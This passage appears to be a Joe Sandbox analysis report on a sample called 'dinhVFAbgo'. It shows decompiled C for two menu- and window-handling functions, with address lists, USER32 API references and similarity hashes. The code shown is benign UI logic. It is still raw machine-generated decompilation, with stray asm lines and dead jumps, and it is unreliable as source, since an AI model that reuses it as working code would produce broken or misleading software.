									if( *((intOrPtr*)(_t207 + 0x254)) != _t164) {
										L36:
										 *(_t207 + 0x2a4) = _t164;
										 *(_t207 + 0x2b0) = _t164;
										SendMessageA( *(_t207 + 0x20), 0xb, _t164, _t164);
										 *0xe17a64();
										 *((intOrPtr*)( *((intOrPtr*)( *_t207 + 0x184))))();
										_t191 =  *((intOrPtr*)(_t207 + 0xc0));
										__eflags = _t191;
										if(_t191 >= 0) {
											 *0xe17a64(_t191);
											 *((intOrPtr*)( *((intOrPtr*)( *_t207 + 0x224))))();
										}
										SendMessageA( *(_t207 + 0x20), 0xb, 1, _t164);
										RedrawWindow( *(_t207 + 0x20), _t164, _t164, 0x585);
									} else {
										__eflags =  *((intOrPtr*)(_t207 + 0x258)) - _t164;
										if( *((intOrPtr*)(_t207 + 0x258)) != _t164) {
											goto L36;
										} else {
											__eflags =  *((intOrPtr*)(_t207 + 0x25c)) - _t164;
											if( *((intOrPtr*)(_t207 + 0x25c)) != _t164) {
												goto L36;
											} else {
												 *0xe17a64();
												 *((intOrPtr*)( *((intOrPtr*)( *_t207 + 0x184))))();
											}
										}
									}
									return E00D06BC8(_t207, _t203, _t207, _t164);
								}
							}
							goto L40;
							L19:
							_t205 = _t205 + 1;
						} while (_t205 <  *((intOrPtr*)(_t159 + 0xbc)));
						goto L20;
					}
				}
				L40:
			}

0x00d0548f
0x00d0548f
0x00d05496
0x00d0549b
0x00d0549d
0x00d054a7
0x00d056e5
0x00d056ea
0x00d054ad
0x00d054ad
0x00d054b1
0x00d054b8
0x00d054c6
0x00d054cb
0x00d054d3
0x00d05658
0x00d05658
0x00d05676
0x00d05681
0x00d0568b
0x00d0568f
0x00d05690
0x00d05692
0x00d05694
0x00d0569d
0x00d056a2
0x00d056b4
0x00d056bc
0x00d056be
0x00d056be
0x00d0569d
0x00d056ca
0x00d056ca
0x00d056d2
0x00d056d9
0x00d056e0
0x00000000
0x00d054d9
0x00d054d9
0x00d054de
0x00d054ec
0x00d054ee
0x00d054f1
0x00d054f5
0x00000000
0x00d054fb
0x00d05500
0x00d05507
0x00d05512
0x00d05515
0x00d05520
0x00d05524
0x00d05532
0x00d05540
0x00d05548
0x00d0554c
0x00d05552
0x00d05557
0x00d055b2
0x00d055bb
0x00000000
0x00d05559
0x00d05559
0x00d0555c
0x00d05569
0x00d05571
0x00d05574
0x00d0557d
0x00000000
0x00000000
0x00d05590
0x00d05602
0x00d0560b
0x00d05612
0x00d055c1
0x00d055c4
0x00d055c9
0x00d055da
0x00d055e0
0x00d055e5
0x00d055ea
0x00d055ed
0x00d055ef
0x00d05619
0x00d05619
0x00d05625
0x00d05625
0x00d05638
0x00d05638
0x00d0563d
0x00d05641
0x00d05646
0x00000000
0x00d05592
0x00d05595
0x00d0559c
0x00d055a4
0x00d055b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00d055b0
0x00000000
0x00d05590
0x00d056f2
0x00d056f7
0x00d056fe
0x00d05700
0x00d0570f
0x00d05717
0x00d0572d
0x00d0572f
0x00d05737
0x00d05739
0x00d05743
0x00d0574a
0x00d0574c
0x00d05754
0x00d05756
0x00d05758
0x00d05758
0x00d0575a
0x00d0575a
0x00d0573b
0x00d0573b
0x00d0573d
0x00d0573d
0x00d0575c
0x00d05762
0x00d05768
0x00d05790
0x00d05797
0x00d0579d
0x00d057a3
0x00d057b3
0x00d057bb
0x00d057bd
0x00d057c3
0x00d057c5
0x00d057d2
0x00d057da
0x00d057da
0x00d057e4
0x00d057f4
0x00d0576a
0x00d0576a
0x00d05770
0x00000000
0x00d05772
0x00d05772
0x00d05778
0x00000000
0x00d0577a
0x00d05784
0x00d0578c
0x00d0578c
0x00d05778
0x00d05770
0x00d05806
0x00d05806
0x00d05557
0x00000000
0x00d0564b
0x00d0564b
0x00d0564c
0x00000000
0x00d054de
0x00d054d3
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 00D05496
CreatePopupMenu.USER32(?,?,?,?,?,?,?,?,?,?,00000020), ref: 00D054BC
GetMenuItemCount.USER32 ref: 00D0554C
GetMenuItemCount.USER32 ref: 00D055A7
AppendMenuA.USER32 ref: 00D055BB
SendMessageA.USER32(00000000,0000007F,00000000,00000000), ref: 00D055DA
GetClassLongA.USER32 ref: 00D0561F

Part of subcall function 00CBAF59: GetMenuStringA.USER32(?,?,00000000,00000000,?), ref: 00CBAF6D
Part of subcall function 00CBAF59: GetMenuStringA.USER32(?,?,00000000,00000001,?), ref: 00CBAF91

InsertMenuA.USER32(00000000,00000000,00000400,?,?), ref: 00D05602
IsWindow.USER32(?), ref: 00D05683
GetSystemMetrics.USER32 ref: 00D0571D
GetSystemMetrics.USER32 ref: 00D0572F
GetSystemMetrics.USER32 ref: 00D0574C
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00D057A3
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00D057E4
RedrawWindow.USER32(?,00000000,00000000,00000585,?,?,80004005,?,?,00000000), ref: 00D057F4

Strings

x&, xrefs: 00D054D9
|$, xrefs: 00D0562B, 00D056C5
x&, xrefs: 00D05646

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Menu$MessageMetricsSendSystem$CountItemStringWindow$AppendClassCreateH_prolog3InsertLongPopupRedraw
String ID: x&$x&$|$
API String ID: 358586863-2227748673
Opcode ID: ff420bbefe8277bda55e7b81126fce7bb133cfb938d27d8050ad3d02edbd9f65
Instruction ID: 186d8e2f39e16dc15297d776e6d942ec6ee021734ebb06dc33559364eee5fbd7
Opcode Fuzzy Hash: ff420bbefe8277bda55e7b81126fce7bb133cfb938d27d8050ad3d02edbd9f65
Instruction Fuzzy Hash: F7B1BA71A00615EFCB049FA4DC89BEEBBB1FF48315F484169E91AB72A1CB709904DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D3EFED Relevance: 30.5, APIs: 20, Instructions: 484
windowCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00D3EFED(void* __ebx, CHAR* __ecx, int __edx, int __edi, void* __esi, void* __eflags, intOrPtr _a8, RECT* _a12, signed int _a16, intOrPtr _a20) {
				int _v0;
				char _v4;
				signed int _v8;
				struct tagRECT _v24;
				intOrPtr* _v28;
				int _v32;
				signed int _v36;
				int _v40;
				signed int* _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v84;
				intOrPtr _v112;
				void* _v116;
				signed int _v120;
				CHAR* _v124;
				int _v128;
				CHAR* _v132;
				CHAR* _v136;
				intOrPtr _v140;
				signed int _v144;
				CHAR* _v148;
				int _v152;
				int _v156;
				void* _v180;
				char _v184;
				int _t244;
				int _t245;
				signed int _t247;
				int _t252;
				void* _t255;
				int _t257;
				intOrPtr* _t258;
				int _t265;
				int _t266;
				signed int _t274;
				int _t275;
				long _t278;
				intOrPtr* _t293;
				int _t298;
				intOrPtr* _t299;
				intOrPtr* _t303;
				void* _t306;
				void* _t310;
				signed int* _t326;
				void* _t329;
				intOrPtr* _t339;
				int _t341;
				int _t343;
				int _t346;
				int _t347;
				int _t353;
				int _t354;
				int _t362;
				CHAR* _t365;
				int _t370;
				int _t373;
				int _t383;
				int _t385;
				int _t393;
				int _t398;
				int _t401;
				int _t410;
				intOrPtr _t413;
				RECT* _t414;
				void* _t415;
				int _t422;
				int _t429;
				void* _t430;
				signed int _t440;
				signed int _t517;
				int _t555;
				int _t556;
				void* _t557;
				intOrPtr* _t559;
				int _t560;
				struct HWND__* _t564;
				CHAR* _t566;
				int _t567;
				void* _t568;
				int _t571;
				intOrPtr _t585;
				intOrPtr* _t586;
				signed int _t589;
				intOrPtr* _t590;
				signed int _t593;
				intOrPtr* _t598;
				CHAR* _t601;
				signed int _t603;
				signed int _t605;

				_t555 = __edi;
				_t554 = __edx;
				_push(0xac);
				E00DDD55F(0xe0f976, __ebx, __edi, __esi);
				_t566 = __ecx;
				_v148 = __ecx;
				_t413 = _a8;
				_v140 = __ecx + 0x1bc;
				E00CAF98A(__ecx + 0x1bc);
				E00CC0B9E( &_v184, 0xa);
				_v4 = 0;
				E00D40465(_t566, __edx,  &_v184, 1, 0, 0);
				_t244 = 0;
				_v128 = 0;
				while(_t244 != 1 || _a12 == 0) {
					while(_t422 != 0) {
						_t245 = _t422;
						__eflags = _t422;
						if(__eflags == 0) {
							E00CAA4E7(_t413, _t422, _t555, _t566, __eflags);
							asm("int3");
							_t603 = _t605;
							_t247 =  *0xe68dd4; // 0x8d2643c2
							_v24.bottom = _t247 ^ _t603;
							_push(_t413);
							_t414 = _a12;
							_push(_t566);
							_push(_t555);
							_t556 = _v0;
							_t567 = _t422;
							_v52 = _a16;
							_v32 = _t567;
							_v36 = _t556;
							_v48 = _a20;
							SetRectEmpty(_t414);
							_t252 = GetKeyState(0x11);
							__eflags = _t252;
							if(_t252 >= 0) {
								_v52 = _v52 & 0x00000000;
								_v36 = _v36 & 0x00000000;
								_t255 = E00CACA6C(0xe68680, _t556);
								 *0xe17a64(_a8, _a12, _t255, 1);
								_t257 =  *((intOrPtr*)( *((intOrPtr*)( *_t567 + 0x14))))();
								_v40 = _t257;
								__eflags = _t257;
								if(_t257 == 0) {
									L73:
									_t258 = _v28;
									_t429 =  *(_t258 + 0x1b8);
									__eflags = _t429;
									if(_t429 == 0) {
										L77:
										_t430 = 0;
										__eflags = 0;
									} else {
										__eflags =  *(_t429 + 8);
										if( *(_t429 + 8) == 0) {
											goto L77;
										} else {
											__eflags =  *(_t429 + 4);
											if( *(_t429 + 4) == 0) {
												goto L77;
											} else {
												_t303 = E00CACA6C(0xe68680, _t556);
												 *0xe17a64();
												_t306 = E00CACA6C(0xe1f3d8,  *((intOrPtr*)( *((intOrPtr*)( *_t303 + 0x1a8))))());
												_t556 = _v32;
												_t430 = _t306;
												_t258 = _v28;
											}
										}
									}
									 *0xe17a64(_a8, _a12,  *0xe686ec, 1, 0, 1, _t430);
									_t571 = E00CACA6C(0xe6896c,  *((intOrPtr*)( *((intOrPtr*)( *_t258 + 0x10))))());
									_v40 = _t571;
									__eflags = _t571;
									if(__eflags == 0) {
										L84:
										_t252 = E00D408A6(_v28, _t554, __eflags, _a8, _a12,  &_v36,  &_v52);
										 *_v44 =  *_v44 & 0x00000000;
										__eflags = _t252;
										if(_t252 != 0) {
											_t265 = E00CACB0B(_t556, 0xe68680);
											__eflags = _t265;
											if(_t265 == 0) {
												_t266 = E00CACB0B(_t556, 0xe6896c);
												__eflags = _t266;
												if(_t266 == 0) {
													goto L92;
												} else {
													_t560 = E00CACA6C(0xe6896c, _t556);
													goto L90;
												}
											} else {
												_t293 = E00CACA6C(0xe68680, _t556);
												 *0xe17a64();
												_t560 = E00CACA6C(0xe1f7d4,  *((intOrPtr*)( *((intOrPtr*)( *_t293 + 0x1a8))))());
												__eflags = _t560;
												if(_t560 == 0) {
													L91:
													_t556 = _v32;
													L92:
													_v24.left = 0;
													_v24.top = 0;
													_v24.right = 0;
													_v24.bottom = 0;
													GetWindowRect( *(_t556 + 0x20),  &_v24);
													asm("sbb eax, eax");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													_t559 = _v28;
													_t274 = E00CB7738( *((intOrPtr*)(_t559 + 0xe4)));
													_t440 = _v36;
													_t275 = _t274 & 0x00400000;
													__eflags = _t440 - 0x1000;
													if(_t440 == 0x1000) {
														__eflags = _t275;
														if(_t275 == 0) {
															goto L98;
														} else {
															goto L103;
														}
														goto L104;
													} else {
														__eflags = _t440 - 0x2000;
														if(_t440 == 0x2000) {
															_t414->bottom = _t414->top - _v24.top + _v24.bottom;
														} else {
															__eflags = _t440 - 0x4000;
															if(_t440 == 0x4000) {
																__eflags = _t275;
																if(_t275 == 0) {
																	L103:
																	_t414->left = _t414->right - _v24.right + _v24.left;
																} else {
																	L98:
																	_t278 = _v24.right - _v24.left + _t414->left;
																	__eflags = _t278;
																	_t414->right = _t278;
																}
															} else {
																__eflags = _t440 - 0x8000;
																if(_t440 == 0x8000) {
																	_t414->top = _t414->bottom - _v24.bottom + _v24.top;
																}
															}
														}
													}
													 *0xe17a64(_t414, _t440);
													 *((intOrPtr*)( *((intOrPtr*)( *_t559 + 0x5c))))();
													_t252 = E00CB9BF2( *((intOrPtr*)(_t559 + 0xe4)), _t414);
												} else {
													L90:
													 *0xe17a64();
													_t252 =  *((intOrPtr*)( *((intOrPtr*)( *_t560 + 0x198))))();
													__eflags = _v36 & _t252;
													if((_v36 & _t252) != 0) {
														goto L91;
													}
												}
											}
										}
									} else {
										__eflags = E00D88E8A(_t571, _t556);
										if(__eflags == 0) {
											goto L84;
										} else {
											_t298 = E00CACB0B(_t556, 0xe68680);
											__eflags = _t298;
											if(_t298 == 0) {
												L83:
												_t299 = E00D88E8A(_t571, _t556);
												 *0xe17a64(_v32, _a8, _a12, _t414, _v48, _v44);
												_t252 =  *((intOrPtr*)( *((intOrPtr*)( *_t299 + 0x29c))))();
											} else {
												 *0xe17a64(E00CACA6C(0xe68680, _t556));
												_t252 =  *((intOrPtr*)( *((intOrPtr*)( *_t571 + 0x338))))();
												__eflags = _t252;
												if(_t252 != 0) {
													_t571 = _v40;
													goto L83;
												}
											}
										}
									}
								} else {
									 *0xe17a64(_t556, _a8, _a12, _t414, _v48, _v44);
									 *((intOrPtr*)( *((intOrPtr*)( *_t257 + 0x1c0))))();
									_t252 = IsRectEmpty(_t414);
									__eflags = _t252;
									if(_t252 != 0) {
										goto L73;
									}
								}
							}
							_pop(_t557);
							_pop(_t568);
							__eflags = _v8 ^ _t603;
							_pop(_t415);
							return E00DDCBCE(_t252, _t415, _v8 ^ _t603, _t554, _t557, _t568);
						} else {
							_v156 =  *_t422;
							_t555 = E00CACA6C(0xe1f7d4,  *((intOrPtr*)(_t245 + 8)));
							__eflags = _t555;
							if(_t555 == 0) {
								L47:
								_t244 = _v128;
							} else {
								_t341 = IsWindow( *(_t555 + 0x20));
								__eflags = _t341;
								if(_t341 == 0) {
									goto L47;
								} else {
									_t566 =  *( *_t555 + 0x288);
									 *0xe17a64();
									_t343 =  *_t566();
									__eflags = _t343;
									if(_t343 == 0) {
										goto L47;
									} else {
										_t566 =  *( *_t555 + 0x1c8);
										 *0xe17a64();
										_t346 =  *_t566();
										__eflags = _t346;
										if(_t346 == 0) {
											goto L47;
										} else {
											_t347 = E00CACB0B(_t555, 0xe68384);
											__eflags = _t347;
											_t244 = _v128;
											if(_t347 == 0) {
												__eflags = _t244;
											} else {
												__eflags = _t244 - 1;
											}
											if(__eflags != 0) {
												E00CA67E1( &_v136);
												_v4 = 1;
												_t566 =  *( *_t555 + 0x28c);
												 *0xe17a64( &_v136);
												 *_t566();
												_t353 = E00CACB0B(_t555, 0xe2a530);
												__eflags = _t353;
												if(_t353 == 0) {
													L28:
													_t354 = E00CACB0B(_t555, 0xe2b5f0);
													__eflags = _t354;
													if(_t354 == 0) {
														_t357 = E00CD5DC4(_v140, __eflags, E00CB7697(_t555),  &_v152);
														__eflags = _t357;
														if(_t357 == 0) {
															__eflags = _v144 - _t357;
															if(_v144 != _t357) {
																__eflags = _v128 - 1;
																if(_v128 == 1) {
																	_t362 = GetMenuItemCount( *(_t413 + 4));
																	__eflags = _t362;
																	if(_t362 > 0) {
																		AppendMenuA( *(_t413 + 4), 0x800, 0, 0);
																	}
																}
															}
															_t566 = _v136;
															AppendMenuA( *(_t413 + 4), 0, E00CB7697(_t555), _t566);
															_t97 =  &_v144;
															 *_t97 = _v144 & 0x00000000;
															__eflags =  *_t97;
															 *(E00CD5246(_t413, _t554, _t555, __eflags, E00CB7697(_t555))) = _t555;
														}
													} else {
														_t566 = E00CACA6C(0xe2b5f0, _t555);
														_t365 = E00CAAAB7(_t566);
														_v124 = _t365;
														_t554 = SendMessageA( *(_t365 + 0x20), 0x40c, 0, 0);
														_t357 = 0;
														_v152 = _t554;
														_v116 = _t566[0x2c0];
														_v112 = 0x230;
														_v120 = 0;
														__eflags = _t554;
														if(__eflags != 0) {
															_t555 = _v128;
															do {
																SendMessageA(_v124[0x20], 0x41d, _t357,  &_v116);
																_t370 = E00CACA6C(0xe1f7d4, E00CB27A9( &_v116, _t555, __eflags, _v84));
																_v132 = _t370;
																__eflags = _t370;
																if(_t370 != 0) {
																	_t566 =  *( *_t370 + 0x288);
																	 *0xe17a64();
																	_t373 =  *_t566();
																	__eflags = _t373;
																	if(_t373 != 0) {
																		 *0xe17a64( &_v136);
																		 *((intOrPtr*)( *((intOrPtr*)( *_v132 + 0x28c))))();
																		__eflags = _v144;
																		if(_v144 != 0) {
																			__eflags = _t555 - 1;
																			if(_t555 == 1) {
																				_t383 = GetMenuItemCount( *(_t413 + 4));
																				__eflags = _t383;
																				if(_t383 > 0) {
																					AppendMenuA( *(_t413 + 4), 0x800, 0, 0);
																				}
																			}
																		}
																		AppendMenuA( *(_t413 + 4), 0, E00CB7697(_v132), _v136);
																		_t566 = _v132;
																		_t83 =  &_v144;
																		 *_t83 = _v144 & 0x00000000;
																		__eflags =  *_t83;
																		 *(E00CD5246(_t413, _t554, _t555, __eflags, E00CB7697(_t566))) = _t566;
																	}
																}
																_t357 = _v120 + 1;
																_v120 = _t357;
																__eflags = _t357 - _v152;
															} while (__eflags < 0);
														}
													}
												} else {
													_t385 = E00CACB0B(_t555, 0xe68440);
													__eflags = _t385;
													if(_t385 != 0) {
														goto L28;
													} else {
														_t566 =  *( *_t555 + 0x3a0);
														 *0xe17a64();
														_t555 =  *_t566();
														_v124 = _t555;
														__eflags = _t555;
														if(_t555 != 0) {
															_v120 = _v120 & 0x00000000;
															_t566 =  *( *_t555 + 0x1ac);
															 *0xe17a64();
															_t357 =  *_t566();
															__eflags = _t357;
															if(_t357 > 0) {
																_t555 = _v128;
																_t517 = _v120;
																do {
																	 *0xe17a64(_t517);
																	_t393 = E00CACA6C(0xe1f7d4,  *((intOrPtr*)( *((intOrPtr*)( *_v124 + 0x1b0))))());
																	_v132 = _t393;
																	__eflags = _t393;
																	if(_t393 != 0) {
																		 *0xe17a64();
																		_t398 =  *((intOrPtr*)( *((intOrPtr*)( *_t393 + 0x288))))();
																		__eflags = _t398;
																		if(_t398 != 0) {
																			_t598 = _v132;
																			_t401 = E00CD5DC4(_v140, __eflags, E00CB7697(_t598),  &_v152);
																			__eflags = _t401;
																			if(_t401 == 0) {
																				 *0xe17a64( &_v136);
																				 *((intOrPtr*)( *((intOrPtr*)( *_t598 + 0x28c))))();
																				__eflags = _v144;
																				if(_v144 != 0) {
																					__eflags = _t555 - 1;
																					if(_t555 == 1) {
																						_t410 = GetMenuItemCount( *(_t413 + 4));
																						__eflags = _t410;
																						if(_t410 > 0) {
																							AppendMenuA( *(_t413 + 4), 0x800, 0, 0);
																						}
																					}
																				}
																				AppendMenuA( *(_t413 + 4), 0, E00CB7697(_v132), _v136);
																				_t601 = _v132;
																				_t48 =  &_v144;
																				 *_t48 = _v144 & 0x00000000;
																				__eflags =  *_t48;
																				 *(E00CD5246(_t413, _t554, _t555, __eflags, E00CB7697(_t601))) = _t601;
																			}
																		}
																	}
																	_v120 = _v120 + 1;
																	_t566 =  *( *_v124 + 0x1ac);
																	 *0xe17a64();
																	_t357 =  *_t566();
																	_t517 = _v120;
																	__eflags = _t517 - _t357;
																} while (_t517 < _t357);
															}
														}
													}
												}
												_v4 = 0;
												E00CA2975(_t357, _v136 - 0x10);
												goto L47;
											}
										}
									}
								}
							}
							_t422 = _v156;
							continue;
						}
						L104:
					}
					_t244 = _t244 + 1;
					_v128 = _t244;
					if(_t244 < 2) {
						continue;
					} else {
						break;
					}
					goto L104;
				}
				_t585 = _v148;
				_t310 = E00CACA6C(0xe283a8,  *((intOrPtr*)(_t585 + 0xe4)));
				_pop(_t535);
				if(_t310 != 0 && _a12 == 0) {
					_t564 = GetWindow( *(_t310 + 0x120), 5);
					if(_t564 != 0) {
						do {
							_t329 = E00CACA6C(0xe292cc, E00CB277F(_t413, _t535, _t554, _t564));
							_pop(_t535);
							if(_t329 != 0) {
								_t590 =  *((intOrPtr*)(_t329 + 0x444));
								_v120 = _t590;
								_t618 = _t590;
								if(_t590 != 0) {
									E00CA67E1( &_v124);
									_v4 = 2;
									 *0xe17a64( &_v124);
									 *((intOrPtr*)( *((intOrPtr*)( *_t590 + 0x28c))))();
									AppendMenuA( *(_t413 + 4), 0, E00CB7697(_v120), _v124);
									_t593 = _v120;
									_t339 = E00CD5246(_t413, _t554, _t564, _t618, E00CB7697(_t593));
									_v4 = 0;
									 *_t339 = _t593;
									_t535 = _v124 - 0x10;
									E00CA2975(_t339, _v124 - 0x10);
								}
							}
							_t564 = GetWindow(_t564, 2);
						} while (_t564 != 0);
						_t585 = _v148;
					}
					_t555 =  *(_t585 + 0x1a0);
					_t620 = _t555;
					if(_t555 != 0) {
						do {
							_t555 =  *_t555;
							_t586 = E00CACA6C(0xe6896c, E00CB27A9(_t535, _t555, _t620,  *((intOrPtr*)(_t555 + 8))));
							_v120 = _t586;
							_pop(_t535);
							_t621 = _t586;
							if(_t586 != 0) {
								E00CA67E1( &_v124);
								_v4 = 3;
								 *0xe17a64( &_v124);
								 *((intOrPtr*)( *((intOrPtr*)( *_t586 + 0x28c))))();
								AppendMenuA( *(_t413 + 4), 0, E00CB7697(_v120), _v124);
								_t589 = _v120;
								_t326 = E00CD5246(_t413, _t554, _t555, _t621, E00CB7697(_t589));
								_v4 = 0;
								 *_t326 = _t589;
								_t535 = _v124 - 0x10;
								E00CA2975(_t326, _v124 - 0x10);
							}
						} while (_t555 != 0);
						_t585 = _v148;
					}
				}
				if( *(_t585 + 0x1e8) != 0) {
					if(GetMenuItemCount( *(_t413 + 4)) > 0) {
						AppendMenuA( *(_t413 + 4), 0x800, 0, 0);
					}
					AppendMenuA( *(_t413 + 4), 0,  *(_t585 + 0x1e8),  *(_t585 + 0x1ec));
				}
				E00CC0BC4( &_v184);
				return E00DDD50E(_t413, _t555, _t585);
				goto L104;
			}

0x00d3efed
0x00d3efed
0x00d3efed
0x00d3eff7
0x00d3effc
0x00d3effe
0x00d3f004
0x00d3f00f
0x00d3f015
0x00d3f022
0x00d3f02d
0x00d3f039
0x00d3f03e
0x00d3f040
0x00d3f043
0x00d3f4cb
0x00d3f065
0x00d3f067
0x00d3f069
0x00d3f6b5
0x00d3f6ba
0x00d3f6bc
0x00d3f6c1
0x00d3f6c8
0x00d3f6ce
0x00d3f6cf
0x00d3f6d2
0x00d3f6d3
0x00d3f6d4
0x00d3f6d7
0x00d3f6d9
0x00d3f6e0
0x00d3f6e3
0x00d3f6e6
0x00d3f6e9
0x00d3f6f1
0x00d3f6f7
0x00d3f6fa
0x00d3f702
0x00d3f706
0x00d3f713
0x00d3f725
0x00d3f72e
0x00d3f730
0x00d3f733
0x00d3f735
0x00d3f769
0x00d3f769
0x00d3f76c
0x00d3f772
0x00d3f774
0x00d3f7bc
0x00d3f7bc
0x00d3f7bc
0x00d3f776
0x00d3f776
0x00d3f77a
0x00000000
0x00d3f77c
0x00d3f77c
0x00d3f780
0x00000000
0x00d3f782
0x00d3f788
0x00d3f79b
0x00d3f7ab
0x00d3f7b0
0x00d3f7b5
0x00d3f7b7
0x00d3f7b7
0x00d3f780
0x00d3f77a
0x00d3f7d8
0x00d3f7ee
0x00d3f7f0
0x00d3f7f5
0x00d3f7f7
0x00d3f874
0x00d3f885
0x00d3f88d
0x00d3f890
0x00d3f892
0x00d3f8a0
0x00d3f8a5
0x00d3f8a7
0x00d3f8e5
0x00d3f8ea
0x00d3f8ec
0x00000000
0x00d3f8ee
0x00d3f8f7
0x00000000
0x00d3f8f7
0x00d3f8a9
0x00d3f8ab
0x00d3f8be
0x00d3f8d3
0x00d3f8d7
0x00d3f8d9
0x00d3f916
0x00d3f916
0x00d3f919
0x00d3f91b
0x00d3f91e
0x00d3f921
0x00d3f924
0x00d3f92e
0x00d3f93e
0x00d3f94b
0x00d3f94c
0x00d3f94d
0x00d3f94e
0x00d3f94f
0x00d3f958
0x00d3f95d
0x00d3f960
0x00d3f965
0x00d3f96b
0x00d3f9e0
0x00d3f9e2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d3f96d
0x00d3f96d
0x00d3f973
0x00d3f9db
0x00d3f975
0x00d3f975
0x00d3f97b
0x00d3f993
0x00d3f995
0x00d3f9e4
0x00d3f9ed
0x00d3f997
0x00d3f997
0x00d3f99d
0x00d3f99d
0x00d3f99f
0x00d3f99f
0x00d3f97d
0x00d3f97d
0x00d3f983
0x00d3f98e
0x00d3f98e
0x00d3f983
0x00d3f97b
0x00d3f973
0x00d3f9ab
0x00d3f9b3
0x00d3f9bc
0x00d3f8db
0x00d3f8f9
0x00d3f903
0x00d3f90b
0x00d3f90d
0x00d3f910
0x00000000
0x00000000
0x00d3f910
0x00d3f8d9
0x00d3f8a7
0x00d3f7f9
0x00d3f800
0x00d3f802
0x00000000
0x00d3f804
0x00d3f80b
0x00d3f810
0x00d3f812
0x00d3f842
0x00d3f844
0x00d3f865
0x00d3f86d
0x00d3f814
0x00d3f82c
0x00d3f835
0x00d3f837
0x00d3f839
0x00d3f83f
0x00000000
0x00d3f83f
0x00d3f839
0x00d3f812
0x00d3f802
0x00d3f737
0x00d3f74f
0x00d3f758
0x00d3f75b
0x00d3f761
0x00d3f763
0x00000000
0x00000000
0x00d3f763
0x00d3f735
0x00d3f9c4
0x00d3f9c5
0x00d3f9c6
0x00d3f9c8
0x00d3f9cf
0x00d3f06f
0x00d3f079
0x00d3f084
0x00d3f088
0x00d3f08a
0x00d3f4c2
0x00d3f4c2
0x00d3f090
0x00d3f093
0x00d3f099
0x00d3f09b
0x00000000
0x00d3f0a1
0x00d3f0a3
0x00d3f0ab
0x00d3f0b3
0x00d3f0b5
0x00d3f0b7
0x00000000
0x00d3f0bd
0x00d3f0bf
0x00d3f0c7
0x00d3f0cf
0x00d3f0d1
0x00d3f0d3
0x00000000
0x00d3f0d9
0x00d3f0e0
0x00d3f0e5
0x00d3f0e7
0x00d3f0ea
0x00d3f0f1
0x00d3f0ec
0x00d3f0ec
0x00d3f0ec
0x00d3f0f3
0x00d3f0ff
0x00d3f106
0x00d3f10a
0x00d3f119
0x00d3f121
0x00d3f12a
0x00d3f12f
0x00d3f131
0x00d3f2c5
0x00d3f2cc
0x00d3f2d1
0x00d3f2d3
0x00d3f444
0x00d3f449
0x00d3f44b
0x00d3f44d
0x00d3f453
0x00d3f455
0x00d3f459
0x00d3f45e
0x00d3f464
0x00d3f466
0x00d3f474
0x00d3f474
0x00d3f466
0x00d3f459
0x00d3f47a
0x00d3f48e
0x00d3f494
0x00d3f494
0x00d3f494
0x00d3f4ae
0x00d3f4ae
0x00d3f2d9
0x00d3f2e6
0x00d3f2ea
0x00d3f2fb
0x00d3f30a
0x00d3f30c
0x00d3f30e
0x00d3f314
0x00d3f317
0x00d3f31e
0x00d3f321
0x00d3f323
0x00d3f329
0x00d3f32c
0x00d3f33c
0x00d3f350
0x00d3f355
0x00d3f35d
0x00d3f35f
0x00d3f367
0x00d3f36f
0x00d3f37b
0x00d3f37d
0x00d3f37f
0x00d3f39c
0x00d3f3a8
0x00d3f3aa
0x00d3f3b1
0x00d3f3b3
0x00d3f3b6
0x00d3f3bb
0x00d3f3c1
0x00d3f3c3
0x00d3f3d1
0x00d3f3d1
0x00d3f3c3
0x00d3f3b6
0x00d3f3ef
0x00d3f3f5
0x00d3f3fd
0x00d3f3fd
0x00d3f3fd
0x00d3f415
0x00d3f415
0x00d3f37f
0x00d3f41a
0x00d3f41b
0x00d3f41e
0x00d3f41e
0x00d3f42a
0x00d3f323
0x00d3f137
0x00d3f13e
0x00d3f143
0x00d3f145
0x00000000
0x00d3f14b
0x00d3f14d
0x00d3f155
0x00d3f15f
0x00d3f161
0x00d3f164
0x00d3f166
0x00d3f16e
0x00d3f172
0x00d3f17a
0x00d3f182
0x00d3f184
0x00d3f186
0x00d3f18c
0x00d3f18f
0x00d3f192
0x00d3f1a0
0x00d3f1b1
0x00d3f1b6
0x00d3f1be
0x00d3f1c0
0x00d3f1d0
0x00d3f1dc
0x00d3f1de
0x00d3f1e0
0x00d3f1e6
0x00d3f201
0x00d3f206
0x00d3f208
0x00d3f21f
0x00d3f22b
0x00d3f22d
0x00d3f234
0x00d3f236
0x00d3f239
0x00d3f23e
0x00d3f244
0x00d3f246
0x00d3f254
0x00d3f254
0x00d3f246
0x00d3f239
0x00d3f272
0x00d3f278
0x00d3f280
0x00d3f280
0x00d3f280
0x00d3f298
0x00d3f298
0x00d3f208
0x00d3f1e0
0x00d3f29d
0x00d3f2a2
0x00d3f2aa
0x00d3f2b3
0x00d3f2b5
0x00d3f2b8
0x00d3f2b8
0x00d3f2c0
0x00d3f186
0x00d3f166
0x00d3f145
0x00d3f4b6
0x00d3f4bd
0x00000000
0x00d3f4bd
0x00d3f0f3
0x00d3f0d3
0x00d3f0b7
0x00d3f09b
0x00d3f4c5
0x00000000
0x00d3f4c5
0x00000000
0x00d3f069
0x00d3f4d3
0x00d3f4d4
0x00d3f4da
